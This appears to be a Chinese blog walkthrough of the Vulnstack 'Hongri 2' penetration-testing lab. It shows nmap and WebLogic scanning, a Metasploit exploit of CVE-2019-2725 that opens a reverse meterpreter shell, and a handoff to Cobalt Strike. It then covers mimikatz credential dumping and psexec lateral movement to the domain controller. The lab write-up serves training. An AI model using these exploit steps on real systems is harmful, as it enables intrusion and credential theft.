ATT&CK 红日2靶机渗透攻略

已于 2022-02-10 17:45:21 修改
阅读量5.3k 收藏 15
点赞数 5
分类专栏: ATT&CK红日靶场实战系列 文章标签: 安全 web安全 网络 渗透测试 网络安全
于 2022-01-27 15:13:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122718165
版权

环境准备

  • 红日靶场一下载地址 :http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

  • 靶机通用密码:1qaz@WSX

  • dc:win2012

  • web:win2008 初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去,并且登进去后启动C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.bat 启动时需要管理员身份(administrator/1qaz@WSX)

  • pc:win7

技术点

Bypass UAC

Windows系统NTLM获取(理论知识:Windows认证)

Access Token利用(MSSQL利用)

WMI利用

网页代理,二层代理,特殊协议代理(DNS,ICMP)

域内信息收集

域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用

域凭证收集

后门技术(黄金票据/白银票据/Sid History/MOF)

拓扑图

在这里插入图片描述

网卡信息:

主机网卡1网卡2
dc:win2012vm1:10.10.10.10NA
web:win2008vm1:10.10.10.80nat:192.168.111.80
pc:win7vm1:10.10.10.201nat:192.168.111.201
攻击机:kalinat:192.168.111.128

信息收集

namp扫描

┌──(root💀kali)-[~]
└─# nmap -sS -sV 192.168.111.80  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-03 04:16 EST
Nmap scan report for bogon (192.168.111.80)
Host is up (0.0026s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 7.5
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
7001/tcp  open  http          Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 00:0C:29:82:35:A5 (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.08 seconds

在这里插入图片描述

访问80发现为空白页面,转便方向访问7001weblogic

在这里插入图片描述

漏洞扫描

使用weblogicscan进行扫描

python3 WeblogicScan.py -u 192.168.111.80 -p 7001  
                                                                                                 
发现cve-2018-2893、cve-2019-2725两个反序列化远程命令执行漏洞

在这里插入图片描述

weblogic漏洞利用

通过msf进行攻击

msf6 > search cve-2019-2725

Matching Modules
================

   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/multi/misc/weblogic_deserialize_asyncresponseservice  2019-04-23       excellent  Yes    Oracle Weblogic Server Deserialization RCE - AsyncResponseService


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice

msf6 > use 0

在这里插入图片描述

更改设置rhosts 、lhost、target 、payload

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 192.168.111.80
rhosts => 192.168.111.80
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.111.128
lhost => 127.0.0.1
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows 
target => Windows
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options 

Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):

   Name       Current Setting               Required  Description
   ----       ---------------               --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.111.80                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      7001                          yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
   VHOST                                    no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows

在这里插入图片描述

在这里插入图片描述

成功getshell

cs上线

在这里插入图片描述

cs监听9090端口

在这里插入图片描述

msf派生shell到cs

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > set lport 9090
lport => 9090
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > run

在这里插入图片描述

cs上线

在这里插入图片描述

域内信息收集

内网主机扫描

shell ipconfig

发现内网网段10.10.10.0/24

在这里插入图片描述

内网主机探活+端口扫描

portscan 10.10.10.0/24

在这里插入图片描述

在这里插入图片描述

可知10.10.10.10的计算机名为dc,基本上可以锁定域控

在这里插入图片描述

执行猕猴桃抓取密码

在这里插入图片描述

在这里插入图片描述

由于weblogic启动需要域管理员密码,而本台webserver2008存在内存明文密码的漏洞 故而可知域管理员账密 administrator/1qaz@WSX

获取域控权限

刚才根据扫描发现域控开放445端口

创建smb监听器

在这里插入图片描述

对目标10.10.10.10(DC)进行横向移动

设置psexec

在这里插入图片描述

dc上线,win7上线同理。通关!

在这里插入图片描述

Forest深林
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
[红日安全]AI安全Day1-机器学习算法在web安全中的应用1
08-08
2、机器学习的最简要素成功的机器学习有四个要素:数据、转换数据的模型、衡量模型好坏的损失函数和一个调整模型权重来最小化损失函数的算法 3、常见的几种机器学习算法
ATT&CK框架介绍及战技术对照表
05-18
ATT&CK框架介绍及战技术对照表
红日靶场第二关
红队是青春
11-16 6969
红日靶场第二关 一、环境配置 环境说明 内网网段:10.10.10.1/24 DMZ网段:192.168.111.1/24 测试机地址:192.168.111.1(Windows),192.168.111.11(Linux) 防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问): deny all tcp ports:10.10.10.1 allow all tcp ports:10.10.10.0/24 配置信息 DC IP:10.10.10.10OS:Windows 2012(64) 应
[VulnStack] ATT&CK实战系列—红队实战(二)
weixin_45605352的博客
08-27 1056
0x00 环境搭建 靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码1qaz@WSX 配置网卡,仅主机模式192.168.10.0网段模拟内网,192.
2016秋语文S版语文一年级上册识字2《红日圆圆》ppt课件4
11-23
2016秋语文S版语文一年级上册识字2《红日圆圆》ppt课件4
江苏省涟水县红日中学2015届中考物理一轮复习力学案2无答案
08-18
江苏省涟水县红日中学2015届中考物理一轮复习力学案2无答案
红日Web安全新手入门专刊.pdf
08-08
目录 1 web 安全新手入门指南 2 安全靶场实例分析
记一次红日靶场2的攻打记录
zhanqinli的博客
07-18 633
1、在配置好靶场环境和开启web服务后,开启kali对靶机进行扫描,可以看到靶机中的开启的445端口和7001端口都很有可能存在系统漏洞;1、接着使用CS自带插件portscan对内网10.10.10.0网段进行扫描,其中445端口都开启着,新建smb监听器来监听445端口,2、接着利用CS进行提权,接着我们利用它来对内网进行信息收集,首先查看主机的信息,以及系统的信息,引言:近日有空摸鱼,闲着无事打一下靶场。二、MSF和CS联动和内网信息收集。三、使用CS渗透内网。至此,渗透基本完成。
ATT&CK红队评估实战靶场二【胎儿教学】
weixin_47536169的博客
11-19 1810
ATT&CK红队评估实战靶场二【胎儿教学】
红日靶场2
weixin_48169878的博客
07-10 4586
1、初始密码1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
红日靶场二
最新发布
weixin_53665747的博客
09-24 200
仅主机1模拟外网,仅主机2模拟内网这里配置web,mssql双网卡这里实际环境可以不用nat,但是我有些工具放到主机里了方便起见还是用了一个nat。
红日靶场(二)
qq_58091216的博客
05-02 1863
整体流程如下:信息收集 => weblogic漏洞利用 => 冰蝎连接上传大马 =>WEB主机上线CS => 内网信息收集 => MS17_010利用 => PTH => DC主机上线 => 挂代理3389登录PC主机 => 上传木马 => PC主机上线 => 构造黄金票据维权 => 痕迹清理。
2016秋语文S版语文一年级上册识字2《红日圆圆》ppt课件2
11-23
2016秋语文S版语文一年级上册识字2《红日圆圆》ppt课件2
ATT&CK手册.pdf
09-20
ATT&CK手册.pdf
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) 八、lateral-movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
ATT&CK手册(修改版)
09-16
ATT&CK手册(修改版)
ATT&CK 知识库(企业)中文版1
08-03
1.1 路过式下载 1 1.2 面向公众应用的利用 2 1.3 外部远程服务 3 1.4 硬件添加 4 1.5 通过移动存储进行复制 5 1.6 鱼叉式钓鱼攻击
内网渗透实战——红日ATT&CK系列靶场(二)学习笔记
ierciyuan的博客
09-14 2799
内网渗透实战攻打红日靶场02,包括环境配置、信息收集、漏洞利用、内网渗透等操作。
MITRE ATT&CK
09-17
MITRE ATT&CK是一个强大且庞大的框架,用于描述和组织关于攻击者战术和技术的知识。它可以帮助安全专业人员了解攻击者可能使用的方法和技术,并提供对防御和检测措施的指导。 ATT&CK框架包括三个主要模型:ATT&CK for Enterprise、ATT&CK for Mobile和ATT&CK for ICS。ATT&CK for Enterprise适用于Windows、Linux、MacOS、云平台等技术和战术。ATT&CK for Mobile适用于移动设备的战术和技术。ATT&CK for ICS适用于工控设备的战术和技术。 ATT&CK框架使用矩阵的方式来展现攻击方的战术和技术。矩阵根据攻击者可能采取的不同行动进行分类。通过研究和理解ATT&CK矩阵,安全专业人员可以更好地了解攻击者的行为模式,并制定相应的防御策略和安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值